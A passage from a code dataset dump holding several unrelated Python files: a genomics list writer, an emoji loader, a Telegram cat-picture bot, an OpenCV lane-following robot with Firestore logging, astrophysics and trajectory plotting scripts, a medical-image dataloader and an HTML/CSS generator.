k, v in filemap.iteritems():\n ct, acc = k\n for peaks, signal in v:\n o.write(\"%s\\t%s\\t%s\\t%s\\t%s\\n\" % (acc, peaks, acc, signal, ct))\n\n @staticmethod\n def _writelist(filemap, path):\n with open(path, \"wb\") as o:\n for k, v in filemap.iteritems():\n ct, acc = k\n peaks, signal = v\n o.write(\"%s\\t%s\\t%s\\n\" % (acc, signal, ct))\n\n def __init__(self, rootdir):\n self.filemap = {}\n for k in CreateHg38.LISTFILES:\n self.filemap[k] = {}\n self.filemap[k + \"_all\"] = {}\n\n # for each assay\n for listfile in CreateHg38.LISTFILES:\n\n # load each exp accession from the existing list\n # for each, append only the first rep to one list and all reps to the other\n with open(os.path.join(rootdir, listfile), \"r\") as f:\n for line in f:\n p = line.strip().split('\\t')\n try:\n e = Exp.fromJsonFile(p[0])\n peaks, signal = CreateHg38._process(e)\n k = p[4] if len(p) >= 5 else p[2]\n self.filemap[listfile][(k, e.encodeID)] = (peaks[1].fileID, signal[1].fileID)\n self.filemap[listfile + \"_all\"][(k, e.encodeID)] = [(peaks[x].fileID, signal[x].fileID) for x, _ in signal.iteritems()]\n except:\n print(\"00_create_hg38$CreateHg38::__init__: could not process %s; skipping\" % p[0])\n\n # if DNase, write all reps to Hotspot-List.txt\n if listfile == \"dnase-list.txt\":\n CreateHg38._writehotspots(self.filemap[listfile + \"_all\"], \"/data/projects/cREs/hg38/Hotspot-List.txt\")\n print(\"wrote /data/projects/cREs/hg38/Hotspot-List.txt\")\n\n # write first reps to list file\n CreateHg38._writelist(self.filemap[listfile], \"/data/projects/cREs/hg38/%s\" % listfile)\n print(\"wrote /data/projects/cREs/hg38/%s\" % listfile)\n\n\ndef main():\n CreateHg38(\"/data/projects/screen/Version-4/ver10/hg19/raw\")\n return 0\n\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","sub_path":"0_cre_pipeline/just21/python/00_create_hg38.py","file_name":"00_create_hg38.py","file_ext":"py","file_size_in_byte":3351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"609066352","text":"import json \nimport pandas as pd \nfrom pandas.io.json import json_normalize\n\n\ndef load_emoji_dict():\n\tfiles = ['Emojis/Activity.json', 'Emojis/Flags.json',\n\t\t\t\t 'Emojis/Food.json', 'Emojis/Nature.json',\n\t\t\t\t 'Emojis/Objects.json', 'Emojis/People.json',\n\t\t\t\t 'Emojis/Symbols.json', 'Emojis/Travel.json']\n\n\temoji_df = pd.DataFrame()\n\n\ttry:\n\t\temoji_df = pd.read_pickle('emojis.pkl')\n\n\texcept:\n\t\tfor file in files:\n\t\t\twith open(file) as f:\n\t\t\t\tdata = json.load(f)\n\t\t\t\tdf_temp = pd.DataFrame.from_dict(json_normalize(data), orient='columns') \n\t\t\t\temoji_df = emoji_df.append(df_temp, ignore_index=True)\n\n\t\temoji_df = emoji_df.set_index('key')\n\t\temoji_df.to_pickle('emojis.pkl')\n\n\temoji_dict = emoji_df.to_dict()\n\temoji_dict = emoji_dict['value']\n\treturn emoji_dict\n","sub_path":"db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"604119386","text":"import os\n\nimport functools\n\nfrom telegram.ext import Updater, CommandHandler\nfrom telegram import ChatAction\nimport logging\n\nimport cat_api\n\n\ndef send_action(action):\n\n def decorator(func):\n @functools.wraps(func)\n def command_func(update, context, *args, **kwargs):\n context.bot.send_chat_action(chat_id=update.effective_message.chat_id, action=action)\n return func(update, context, *args, **kwargs)\n return command_func\n\n return decorator\n\n\ndef start_callback(update, context):\n context.bot.send_message(chat_id=update.message.chat_id,\n text=f'Hello, {update.effective_user.first_name}!\\nSee /help for instructions')\n\n\n@send_action(ChatAction.TYPING)\ndef help_callback(update, context):\n context.bot.send_message(chat_id=update.message.chat_id,\n text='To get a random catpic - just type /cat. '\n 'To get a specific breed - type /cat . '\n ' is four-character ID. '\n 'Here is the mapping of breed and their IDs:\\n\\n'\n + str(cat_api.get_breeds_list()))\n\n\n@send_action(ChatAction.UPLOAD_PHOTO)\ndef cat_callback(update, context):\n context.bot.send_photo(chat_id=update.message.chat_id, photo=cat_api.cat_by_breed(context.args))\n\n\nif __name__ == '__main__':\n\n TOKEN = os.environ['TG_TOKEN']\n NAME = 'cats-tg-bot'\n PORT = os.environ.get('PORT')\n\n logging.basicConfig(format='%(asctime)s - %(levelname)s - %(message)s',\n level=logging.INFO)\n\n updater = Updater(TOKEN, use_context=True)\n\n dispatcher = updater.dispatcher\n\n dispatcher.add_handler(CommandHandler('start', start_callback))\n dispatcher.add_handler(CommandHandler('help', help_callback))\n dispatcher.add_handler(CommandHandler('cat', cat_callback))\n\n updater.start_webhook(listen=\"0.0.0.0\",\n port=int(PORT),\n url_path=TOKEN)\n updater.bot.setWebhook(f\"https://{NAME}.herokuapp.com/{TOKEN}\")\n updater.idle()\n","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":2131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"261267984","text":"import cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport modi\nimport time\nimport firebase_admin\nfrom firebase_admin import credentials\nfrom firebase_admin import firestore\n\ndef make_coordinates(image, line_parameters):\n slope, intercept = line_parameters\n y1 = image.shape[0]\n y2 = int(y1*(2/5))\n x1 = int((y1 - intercept)/slope)\n x2 = int((y2 - intercept)/slope)\n return np.array([x1, y1, x2, y2])\n\ndef average_slope_intercept(image, lines):\n left_fit = []\n right_fit = []\n for line in lines:\n x1, y1, x2, y2 = line.reshape(4)\n parameters = np.polyfit((x1, x2), (y1, y2), 1)\n slope = parameters[0]\n intercept = parameters[1]\n if slope < -0.5:\n left_fit.append((slope, intercept))\n elif 0.5 < slope:\n right_fit.append((slope, intercept))\n if (len(left_fit) != 0):\n left_fit_average = np.average(left_fit, axis=0)\n else:\n left_fit_average = ((1, 10))\n if (len(right_fit) != 0):\n right_fit_average = np.average(right_fit, axis=0)\n else:\n right_fit_average = ((1, 10))\n left_line = make_coordinates(image, left_fit_average)\n rigth_line = make_coordinates(image, right_fit_average)\n return np.array([left_line, rigth_line])\n\ndef canny(image):\n gray = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)\n blur = cv2.GaussianBlur(gray, (5, 5), 0)\n canny = cv2.Canny(blur, 50, 150)\n return canny\n\ndef display_lines(image, lines):\n line_image = np.zeros_like(image)\n if lines is not None:\n for x1, y1, x2, y2 in lines:\n cv2.line(line_image, (x1, y1), (x2, y2), (255, 0, 0), 10)\n return line_image\n\ndef t_display_lines(image, lines):\n line_image = np.zeros_like(image)\n if lines is not None:\n for line in lines:\n x1, y1, x2, y2 = line.reshape(4)\n cv2.line(line_image, (x1, y1), (x2, y2), (255, 0, 0), 10)\n return line_image\n\ndef region_of_interest(image):\n height = image.shape[0]\n polygons = np.array([[(100, height), (600, height), (500, 300), (120,300)]])\n mask = np.zeros_like(image)\n cv2.fillPoly(mask, polygons, 255)\n masked_image = cv2.bitwise_and(image, mask)\n return masked_image\n\ndef find_vanishing(image, lines):\n x11, y11, x12, y12 = lines[0]\n x21, y21, x22, y22 = lines[1]\n m1 = (y12 - y11) / (x12 - x11)\n m2 = (y22 - y21) / (x22 - x21)\n cx = int((x11 * m1 - y11 - x21 * m2 + y21) / (m1 - m2))\n center = int((x11+x21)/2)\n\n cv2.line(image, (cx, 0), (cx, image.shape[0]), (0, 0, 255), 10) \n cv2.putText(image, str(cx), (cx+10, 100), cv2.FONT_HERSHEY_PLAIN, 2, (0, 0, 255), 2)\n cv2.line(image, (center, 0), (center, image.shape[0]), (0, 255, 0), 10)\n cv2.putText(image, str(center), (center+10, 100), cv2.FONT_HERSHEY_PLAIN, 2, (0, 255, 0), 2)\n\n return image, cx, center\n\ndef find_num(image, canny):\n _, contours, _ = cv2.findContours(canny, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\n MIN_AREA = 50\n MAX_AREA = 5000\n MIN_RATIO, MAX_RATIO = 0.5, 1.0\n MIN_HEIGHT = 10\n dt = 50\n number = 10\n\n for contour in contours:\n x, y, w, h = cv2.boundingRect(contour)\n area = w * h\n ratio = w / h\n\n if MIN_AREA < area < MAX_AREA \\\n and MIN_RATIO < ratio < MAX_RATIO \\\n and MIN_HEIGHT < h:\n center_x = int((2 * x + w) / 2)\n center_y = int((2 * y + h) / 2)\n if ((center_x-dt) > 200) and (center_x < 600) and ((center_y-dt) > 400) and (center_y < 1000):\n img = image[center_y-dt:center_y+dt, center_x-dt:center_x+dt]\n number = process(img) \n cv2.rectangle(image, pt1=(center_x - 50, center_y - 50), pt2=(center_x + 50, center_y + 50), color=(0, 255, 0), thickness=2)\n cv2.putText(image, \"Number\", (x+w, y), cv2.FONT_HERSHEY_PLAIN, 1, (0, 255, 0), 1)\n else:\n cv2.rectangle(image, pt1=(x, y), pt2=(x+w, y+h), color=(255, 0, 0), thickness=2)\n cv2.putText(image, \"No\", (x+w, y), cv2.FONT_HERSHEY_PLAIN, 1, (255, 0, 0), 1)\n cv2.imshow('res', image)\n return number\n\ndef find_way(vanishing, center):\n diff = vanishing - center\n print(diff)\n if diff < -70:\n left()\n elif diff > 70:\n right()\n else:\n forward()\n\n# Initialize MazeRunner, gets MODI class\n# Add needed modules\ndef init_MR(bundle):\n print('modules list\\n', bundle.modules)\n motor = bundle.motors[0]\n return len(bundle.modules), motor\n\n# Checks module connection status by comparing module numbers.\ndef is_connected(curr_num):\n if curr_num != module_num:\n print('\\n--------interrupt!!!---------')\n print('Some modules disconnected!!')\n return False\n else:\n return True\n\n# MODI goes forward, gets delay, speed args\ndef forward(delay=3, speed=100):\n motor.speed(0, 0)\n time.sleep(0.001)\n # if button.clicked() == True:\n print('-----forward!!-----')\n for _ in range(delay):\n # mazeprint(ir.distance())\n time.sleep(0.001)\n motor.speed(speed, -speed)\n time.sleep(0.001)\n motor.speed(0, 0)\n\n# MODI turns left, gets delay arg.\ndef left(delay=1):\n motor.speed(0, 0)\n time.sleep(0.001)\n print('-----left!!-----')\n for _ in range(delay):\n time.sleep(0.001)\n motor.speed(-100, -100)\n time.sleep(0.001)\n motor.speed(0, 0)\n\n# MODI turns right, gets delay arg.\ndef right(delay=1):\n motor.speed(0, 0)\n time.sleep(0.001)\n print('-----right!!-----')\n for _ in range(delay):\n time.sleep(0.001)\n motor.speed(100, 100)\n time.sleep(0.001)\n motor.speed(0, 0)\n\n\nmsg_cnt = 100 \ndef mazeprint(msg, arg=None):\n global msg_cnt\n db = firestore.client()\n doc_ref = db.collection(u'Maze').document(str(msg_cnt))\n if arg:\n print(msg, arg)\n doc_ref.set({\n u'Text': str(msg) + \" \" + str(arg)\n })\n else:\n print(msg)\n doc_ref.set({\n u'Text': msg\n })\n msg_cnt = msg_cnt + 1\n\ndef delete_collection(coll_ref, batch_size):\n docs = coll_ref.limit(batch_size).get()\n deleted = 0\n\n for doc in docs:\n print(u'Deleting doc {} => {}'.format(doc.id, doc.to_dict()))\n doc.reference.delete()\n deleted = deleted + 1\n\n if deleted >= batch_size:\n return delete_collection(coll_ref, batch_size)\n\nif __name__==\"__main__\":\n # Initialize\n cred = credentials.Certificate(\"./AccountKey.json\")\n firebase_admin.initialize_app(cred)\n delete_collection(firestore.client().collection(u'Maze'), 200)\n bundle = modi.MODI()\n time.sleep(1)\n module_num, motor = init_MR(bundle)\n time.sleep(1)\n print('MODI Connected!')\n\n # Main\n cap = cv2.VideoCapture(-1)\n while(cap.isOpened()):\n time.sleep(0.01)\n _, frame = cap.read()\n canny_image = canny(frame)\n cropped_image = region_of_interest(canny_image)\n lines = cv2.HoughLinesP(cropped_image, 2, np.pi/180, 100, np.array([]), minLineLength=40, maxLineGap=3)\n if len(lines) < 2:\n continue\n averaged_lines = average_slope_intercept(frame, lines)\n find_vanishing(frame, averaged_lines)\n line_image = t_display_lines(frame, averaged_lines)\n vanishing_line, vanishing, center = find_vanishing(line_image, averaged_lines)\n combo_image = cv2.addWeighted(frame, 0.8, vanishing_line, 1, 1)\n find_way(vanishing, center)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n cap.release()\n cv2.destroyAllWindows()\n","sub_path":"src/EyeCar.py","file_name":"EyeCar.py","file_ext":"py","file_size_in_byte":6985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"11259687","text":"import numpy as np\nfrom dragons import meraxes\nimport os\nimport matplotlib.pyplot as plt\nimport matplotlib\nimport sys\nimport pandas as pd\nsys.path.append('/home/mmarshal/simulation_codes')\nimport ContourPlot as cp\nimport pylab as p\nimport scipy.stats as stats\nfrom scipy.optimize import curve_fit\nfrom _load_data import load_data\n\nmatplotlib.rcParams['font.size'] = (9)\nmatplotlib.rcParams['figure.figsize'] = (3.5,3.5)\nplt.rc('text', usetex=True)\nplt.rc('font', family='serif')\ncolors=['#e41a1c','#377eb8','#4daf4a']\n\n\ndef plot_median_ratio(redshift,med,pctile84,pctile16,axes,color='b',**kwargs):\n axes.fill_between(np.array(list(redshift.values())),np.array(list(pctile84.values())),\\\n np.array(list(pctile16.values())),alpha=0.15,color=color)\n axes.plot(np.array(list(redshift.values())),np.array(list(med.values())),'-',linewidth=2.5,color=color,**kwargs)\n\n\ndef find_med(gals,stellarmass):\n gals=gals[gals[stellarmass]>0]\n if np.size(gals)==0:\n return [np.nan,np.nan,np.nan]\n else:\n pct=np.log10(np.percentile(gals['BlackHoleMass']/gals[stellarmass],[50,84,16]))\n return pct\n\n \ndef func(x,a,b):\n return b**np.log10(1+x)+np.log10(a)\n\n\ndef func_plot(x,a,b):\n return a *(1+x)**b\n\n\ndef plot_schulze(axes):\n obs=[0.025,0.34,0.52,1.29]\n intrinsic=[0.025,0.15,0.15,-0.02]\n z=[0.56,1.5,4.2,6]\n z_err_1=[-0.175,0.175]\n z_err_2=[-0.5,0.5]\n z_err_3=[-0.1,0.1]\n z_err_4=[-0.25,0.25]\n z_err=[[0.175,0.5,0.1,0.25],[0.175,0.5,0.1,0.25]]\n in_err_1=[-0.09,0.09]\n in_err_2=[-0.08,0.27]\n in_err_3=[-1.49,0.98]\n in_err_4=[-2.76,1.36]\n in_err=[[0.09,0.08,1.49,2.76],[0.09,0.27,0.98,1.36]]\n axes.errorbar(z,np.array(intrinsic)-2.85,xerr=np.array(z_err),yerr=np.array(in_err),marker='o',capsize=2,linestyle='None',color='gray')\n axes.plot(z,np.array(obs)-2.85,'o',markerfacecolor='white',markeredgecolor='gray')\n\nif __name__==\"__main__\":\n filename='paper2'\n filename2='paper2_T125'\n filenameMR='paper2_T125MR'\n filenameNR='draft2_T125NR'\n #snapshots=np.linspace(52,158,30)\n snapshots=np.arange(30,80,10)\n med={}\n pctile84={}\n pctile16={}\n med_b={}\n pctile84_b={}\n pctile16_b={}\n med_125_b={}\n pctile84_125_b={}\n pctile16_125_b={}\n med_125={}\n pctile84_125={}\n pctile16_125={}\n med_MR={}\n pctile84_MR={}\n pctile16_MR={}\n med_NR={}\n pctile84_NR={}\n pctile16_NR={}\n\n redshift={}\n for snapshot in snapshots:\n redshift[snapshot]=meraxes.io.grab_redshift('/home/mmarshal/data_dragons/'+filename+'/output/meraxes.hdf5', int(snapshot))\n gals=load_data(filename,snapshot,['StellarMass','BulgeStellarMass','BlackHoleMass'])\n gals=gals[(gals['BlackHoleMass']*1e10>1e6)]\n\n med[snapshot],pctile84[snapshot],pctile16[snapshot]=find_med(gals,'StellarMass')\n \n gals_125=load_data(filename2,snapshot,['StellarMass','BulgeStellarMass','BlackHoleMass'])\n gals_125=gals_125[(gals_125['BlackHoleMass']*1e10>1e6)]\n med_125[snapshot],pctile84_125[snapshot],pctile16_125[snapshot]=find_med(gals_125,'StellarMass')\n\n gals_MR=load_data(filenameMR,snapshot,['StellarMass','BulgeStellarMass','BlackHoleMass'])\n gals_MR=gals_MR[(gals_MR['BlackHoleMass']*1e10>1e6)]\n med_MR[snapshot],pctile84_MR[snapshot],pctile16_MR[snapshot]=find_med(gals_MR,'StellarMass')\n \n #gals_NR=load_data(filenameNR,snapshot,['StellarMass','BulgeStellarMass','BlackHoleMass'])\n #med_NR[snapshot],pctile84_NR[snapshot],pctile16_NR[snapshot]=find_med(gals_NR,'StellarMass')\n #med_125_b[snapshot],pctile84_125_b[snapshot],pctile16_125_b[snapshot]=find_med(gals_125,'BulgeStellarMass')\n \n\n fig,axes=plt.subplots(1,1)\n axes.set_xlabel('Redshift')\n \n plot_median_ratio(redshift,med,pctile84,pctile16,axes,color=colors[0],**{'label':'Tiamat'})\n plot_median_ratio(redshift,med_125,pctile84_125,pctile16_125,axes,color=colors[1],**{'label':'Tiamat-125-HR','linestyle':'-','lw':1})\n plot_median_ratio(redshift,med_MR,pctile84_MR,pctile16_MR,axes,color=colors[2],**{'label':'Tiamat-125-MR','linestyle':'-','lw':1})\n\n lgd=axes.legend(fontsize='small',ncol=3,loc='upper center', bbox_to_anchor=(0.42, -0.2))\n\n axes.set_ylabel(r'$\\log(M_{\\mathrm{BH}}/M_{\\ast})$')\n axes.invert_xaxis()\n axes.set_xlim([8,2]) \n axes.set_ylim([-4.1,-1.9]) \n axes.set_yticks(np.arange(-4.0,-1.99, 0.5))\n\n plt.tight_layout()\n fig.savefig('/home/mmarshal/results/plots/Paper2/MeanBHBulge_resolutionTest.pdf', format='pdf',bbox_extra_artists=(lgd,), bbox_inches='tight')\n plt.show()\n","sub_path":"MeanBHBulge_resolutionTest.py","file_name":"MeanBHBulge_resolutionTest.py","file_ext":"py","file_size_in_byte":4396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"333329371","text":"import numpy as np\n#from sklearn.metrics import f1_score\n#D: this is some package for meidcal images, so getting rid of it\n#import nibabel as nib\nimport os\n\n#to make directories\nimport pathlib\nfrom skimage import transform\n\nclass dataloaderObj:\n\n #define functions to load data from ACDC dataset\n def __init__(self,cfg):\n #print('dataloaders init')\n self.data_path_tr=cfg.data_path_tr\n self.data_path_tr_cropped=cfg.data_path_tr_cropped\n self.target_resolution=cfg.target_resolution\n self.size=cfg.size\n self.num_classes=cfg.num_classes\n\n def normalize_minmax_data(self, image_data):\n \"\"\"\n # 3D MRI scan is normalized to range between 0 and 1 using min-max normalization.\n Here, the minimum and maximum values are used as 2nd and 98th percentiles respectively from the 3D MRI scan.\n We expect the outliers to be away from the range of [0,1].\n input params :\n image_data : 3D MRI scan to be normalized using min-max normalization\n returns:\n final_image_data : Normalized 3D MRI scan obtained via min-max normalization.\n \"\"\"\n min_val_2p=np.percentile(image_data,2)\n max_val_98p=np.percentile(image_data,98)\n final_image_data=np.zeros((image_data.shape[0],image_data.shape[1],image_data.shape[2]), dtype=np.float64)\n # min-max norm on total 3D volume\n final_image_data=(image_data-min_val_2p)/(max_val_98p-min_val_2p)\n return final_image_data\n\n\n def load_acdc_imgs(self, study_id_list,ret_affine=0):\n \"\"\"\n #Load ACDC data image and its label with pixel dimensions\n input params :\n study_id_list: id no of the image to be loaded\n ret_affine: variable to enable returning of affine transformation matrix of the loaded image\n returns :\n image_data_test_sys : normalized 3D image\n label_data_test_sys : 3D label mask of the image\n pixel_size : pixel dimensions of the loaded image\n affine_tst : affine transformation matrix of the loaded image\n \"\"\"\n\n for study_id in study_id_list:\n path_files=str(self.data_path_tr)+str(study_id)+'/'\n systole_lstfiles = [] # create an empty list\n for dirName, subdirList, fileList in os.walk(path_files):\n fileList.sort()\n for filename in fileList:\n if \"_frame01\" in filename.lower():\n systole_lstfiles.append(os.path.join(dirName,filename))\n elif \"_frame04\" in filename.lower():\n systole_lstfiles.append(os.path.join(dirName,filename))\n\n # Load the 3D image\n image_data_test_load = nib.load(systole_lstfiles[0])\n image_data_test_sys=image_data_test_load.get_data()\n pixel_size=image_data_test_load.header['pixdim'][1:4]\n affine_tst=image_data_test_load.affine\n\n # Normalize input data\n image_data_test_sys=self.normalize_minmax_data(image_data_test_sys)\n\n # Load the segmentation mask\n label_data_test_load = nib.load(systole_lstfiles[1])\n label_data_test_sys=label_data_test_load.get_data()\n\n if(ret_affine==0):\n return image_data_test_sys,label_data_test_sys,pixel_size\n else:\n return image_data_test_sys,label_data_test_sys,pixel_size,affine_tst\n\n\n def crop_or_pad_slice_to_size_1hot(self, img_slice, nx, ny):\n\n \"\"\"\n To crop the input 2D slice for the given dimensions in 1-hot encoding format)\n input params :\n image_slice : 2D slice to be cropped (in 1-hot encoding format)\n nx : dimension in x\n ny : dimension in y\n returns:\n slice_cropped : cropped 2D slice\n \"\"\"\n slice_cropped=np.zeros((nx,ny,self.num_classes))\n x, y, _ = img_slice.shape\n\n x_s = (x - nx) // 2\n y_s = (y - ny) // 2\n x_c = (nx - x) // 2\n y_c = (ny - y) // 2\n\n if x > nx and y > ny:\n slice_cropped = img_slice[x_s:x_s + nx, y_s:y_s + ny]\n else:\n slice_cropped = np.zeros((nx, ny,self.num_classes))\n if x <= nx and y > ny:\n slice_cropped[x_c:x_c + x, :] = img_slice[:, y_s:y_s + ny]\n elif x > nx and y <= ny:\n slice_cropped[:, y_c:y_c + y] = img_slice[x_s:x_s + nx, :]\n else:\n slice_cropped[x_c:x_c + x, y_c:y_c + y] = img_slice[:, :]\n\n return slice_cropped\n\n def crop_or_pad_slice_to_size(self, img_slice, nx, ny):\n \"\"\"\n To crop the input 2D slice for the given dimensions\n input params :\n image_slice : 2D slice to be cropped\n nx : dimension in x\n ny : dimension in y\n returns:\n slice_cropped : cropped 2D slice\n \"\"\"\n slice_cropped=np.zeros((nx,ny))\n x, y = img_slice.shape\n\n x_s = (x - nx) // 2\n y_s = (y - ny) // 2\n x_c = (nx - x) // 2\n y_c = (ny - y) // 2\n\n if x > nx and y > ny:\n slice_cropped = img_slice[x_s:x_s + nx, y_s:y_s + ny]\n else:\n slice_cropped = np.zeros((nx, ny))\n if x <= nx and y > ny:\n slice_cropped[x_c:x_c + x, :] = img_slice[:, y_s:y_s + ny]\n elif x > nx and y <= ny:\n slice_cropped[:, y_c:y_c + y] = img_slice[x_s:x_s + nx, :]\n else:\n slice_cropped[x_c:x_c + x, y_c:y_c + y] = img_slice[:, :]\n\n return slice_cropped\n\n def preprocess_data(self, img, mask, pixel_size,label_present=1):\n \"\"\"\n To preprocess the input 3D volume into given target resolution and crop them into dimensions specified in the init_acdc.py file\n input params :\n img : input 3D image volume to be processed\n mask : corresponding 3D segmentation mask to be processed\n pixel_size : the native pixel size of the input image\n label_present : to indicate if the image has labels provided or not (used for unlabeled images)\n returns:\n cropped_img : processed and cropped 3D image\n cropped_mask : processed and cropped 3D segmentation mask\n \"\"\"\n nx,ny=self.size\n\n #scale vector to rescale to the target resolution\n scale_vector = [pixel_size[0] / self.target_resolution[0], pixel_size[1] / self.target_resolution[1]]\n\n for slice_no in range(img.shape[2]):\n\n slice_img = np.squeeze(img[:, :, slice_no])\n slice_rescaled = transform.rescale(slice_img,\n scale_vector,\n order=1,\n preserve_range=True,\n mode = 'constant')\n if(label_present==1):\n slice_mask = np.squeeze(mask[:, :, slice_no])\n mask_rescaled = transform.rescale(slice_mask,\n scale_vector,\n order=0,\n preserve_range=True,\n mode='constant')\n\n slice_cropped = self.crop_or_pad_slice_to_size(slice_rescaled, nx, ny)\n if(label_present==1):\n mask_cropped = self.crop_or_pad_slice_to_size(mask_rescaled, nx, ny)\n\n if(slice_no==0):\n cropped_img=np.reshape(slice_cropped,(nx,ny,1))\n if(label_present==1):\n cropped_mask=np.reshape(mask_cropped,(nx,ny,1))\n else:\n slice_cropped_tmp=np.reshape(slice_cropped,(nx,ny,1))\n cropped_img=np.concatenate((cropped_img,slice_cropped_tmp),axis=2)\n if(label_present==1):\n mask_cropped_tmp=np.reshape(mask_cropped,(nx,ny,1))\n cropped_mask=np.concatenate((cropped_mask,mask_cropped_tmp),axis=2)\n\n if(label_present==1):\n return cropped_img,cropped_mask\n else:\n return cropped_img\n\n def load_imgs(self, dataset= 'lab'):\n \"\"\"\n # Load the training or validation images\n input params :\n val : if TRUE, loads validation images. default value is False and loads labeled training images\n label_present : to indicate if the image has labels provided or not (used for unlabeled images)\n returns:\n img_cat : stack of 3D images of all the patient id nos.\n mask_cat : corresponding stack of 3D segmentation masks of all the patient id nos.\n \"\"\"\n\n if dataset == 'val':\n img_type = 'val'\n label_present = 1\n elif dataset == 'lab':\n img_type = 'lab'\n label_present = 1\n elif dataset == 'unlab':\n img_type = 'unlab'\n label_present = 0\n else:\n raise ValueError('invalid dataset type specified or data filename wrong')\n\n #D: change path name to end in \"large\", ie: '_x_large.npy' and '_y_large.npy' vs '_x_mini.npy' and '_y_mini.npy'\n # to use large dataset\n img_fname = str(self.data_path_tr_cropped)+'/' + img_type + '_x_large2.npy'\n img_tmp=np.load(img_fname)\n if(label_present==1):\n mask_fname = str(self.data_path_tr_cropped)+'/' + img_type + '_y_large2.npy'\n mask_tmp=np.load(mask_fname)\n\n if(label_present==1):\n print('image shape: ', img_tmp.shape)\n print('mask shape: ', mask_tmp.shape)\n return img_tmp,mask_tmp\n else:\n print('image shape: ', img_tmp.shape)\n return img_tmp","sub_path":"tree_gan/dataloaders.py","file_name":"dataloaders.py","file_ext":"py","file_size_in_byte":9783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"236508074","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\ntime = np.linspace(0,5,101)\ng = 9.81\nv_0 = 20\n\ndef calc_x(time, theta):\n x_pos = v_0 * time * np.cos(theta)\n return x_pos\n\ndef calc_y(time, theta):\n y_pos = (v_0 * time * np.sin(theta)) - (0.5 * g * time**2)\n return y_pos\n\nfor deg in (30, 45, 60):\n \n rad = (np.pi / 180) * deg\n xs = calc_x(time, rad)\n ys = calc_y(time, rad)\n\n idx = 0\n for i, y in enumerate(ys):\n if y < 0:\n idx = i\n break\n \n plt.plot(xs[:idx], ys[:idx], 'o', label=f'{deg}°')\n\nplt.title('Trajectories. v0 = 20 m/s')\nplt.xlabel('distance / m')\nplt.ylabel('height / m')\nplt.legend()\nplt.savefig('trajectory.png')\nplt.show()\n","sub_path":"trajectory.py","file_name":"trajectory.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"398143572","text":"import sys\nimport os\n\nimport util\nimport parser\nimport htmlwriter\n\n#create the initial HTML file\ndef initFile(filename):\n html_file = util.constructString(\n \"\",\n \"\",\n \"\",\n \"\" + filename + \"\",\n \"\",\n \"\\t\",\n \"\\t\" + util.addJs(filename + \".js\"),\n \"\\t\" + util.addJs(\"https://cdn.jsdelivr.net/gh/google/code-prettify@master/loader/run_prettify.js\"),\n \"\\t\" + util.addJs(\"https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.5/MathJax.js?config=TeX-MML-AM_CHTML\", \"async\"),\n \"\",\n \"\"\n )\n\n html_file += util.constructString(\n \"
\",\n \"
\"\n )\n\n html_fd = open(filename + \".html\", \"w+\")\n html_fd.write(html_file)\n\n css_fd = open(filename + \".css\", \"w+\")\n\n css_file = util.addCss(\n \"html\", \"font-family: Arial, Helvetica, sans-serif\",\n \"line-height: 2\"\n )\n css_file += util.addCss(\n \":root\",\n \"--primary:#9c84a4\",\n \"--highlight:#b597bf\"\n )\n #add the media query for the body\n css_file += util.addMediaQuery(\n \"1600\", \"10000\",\n \"body\", \"display:grid\",\n \"grid-template-columns: auto 800px auto\",\n \"margin:0px\",\n \"padding:0px\"\n )\n css_file += util.addMediaQuery(\n \"1280\", \"1599\",\n \"body\", \"display:grid\",\n \"grid-template-columns: 350px auto 350px\"\n )\n css_file += util.addMediaQuery(\n \"1025\", \"1280\",\n \"body\", \"display:grid\",\n \"grid-template-columns: auto minmax(auto, 800px) auto\"\n )\n css_file += util.addMediaQuery(\n \"768\", \"1024\",\n \"body\", \"display:grid\",\n \"grid-template-columns: 50px auto 50px\"\n )\n css_file += util.addMediaQuery(\n \"481\", \"767\", \"body\", \"display:grid\",\n \"grid-template-columns: 25px auto 25px\"\n )\n css_file += util.addMediaQuery(\n \"320\", \"480\", \"body\", \"display:grid\",\n \"grid-template-columns: 10px auto 10px\"\n )\n css_file += util.addCss(\n \"p,h2,ul,ol,h1,pre\", \"grid-column-start : 2\",\n \"grid-column-end : 3\",\n \"width:inherit\",\n \"margin:15px\"\n )\n css_file += util.addCss(\n \"b,i,a\", \"grid-column-start : 2\",\n \"grid-column-end : 3\",\n \"padding-left:15px\",\n \"padding-right:15px\"\n )\n css_file += util.addCss(\n \"h1,h2\", \"margin-top:0px\",\n \"margin-bottom:0px\"\n )\n css_file += util.addCss(\n \".background\", \"background-color:rgb(250, 250, 250 )\"\n )\n css_file += util.addCss(\n \"hr\",\n \"height: 1px\",\n \"border: 0\",\n \"border-top: 1px solid gray\",\n \"margin: 2.5px\",\n \"padding: 0\",\n \"width: 90%\",\n )\n css_file += util.addCss(\n \".draggable\",\n \"position:absolute\",\n \"z-index:9\",\n \"border:1px solid #d3d3d3\",\n \"background-color:white\",\n \"max-width:500px\",\n \"border-radius: 10px 10px 0px 0px\",\n \"box-shadow: 1px 1px 12px grey;\"\n )\n\n css_file += util.addCss(\n \".draggable_content\",\n \"max-height:400px\",\n \"overflow-y:auto\",\n )\n\n css_file += util.addCss(\n \".ref_header\",\n \"cursor:move\",\n \"z-index:10\",\n \"background-color:#9c84a4\",\n \"color:#fff\",\n \"display: grid\",\n \"grid-template-columns: 10px auto 20px 10px\",\n \"grid-column-start: 1\",\n \"align-items: center\",\n \"border-radius: 10px 10px 0px 0px\"\n )\n 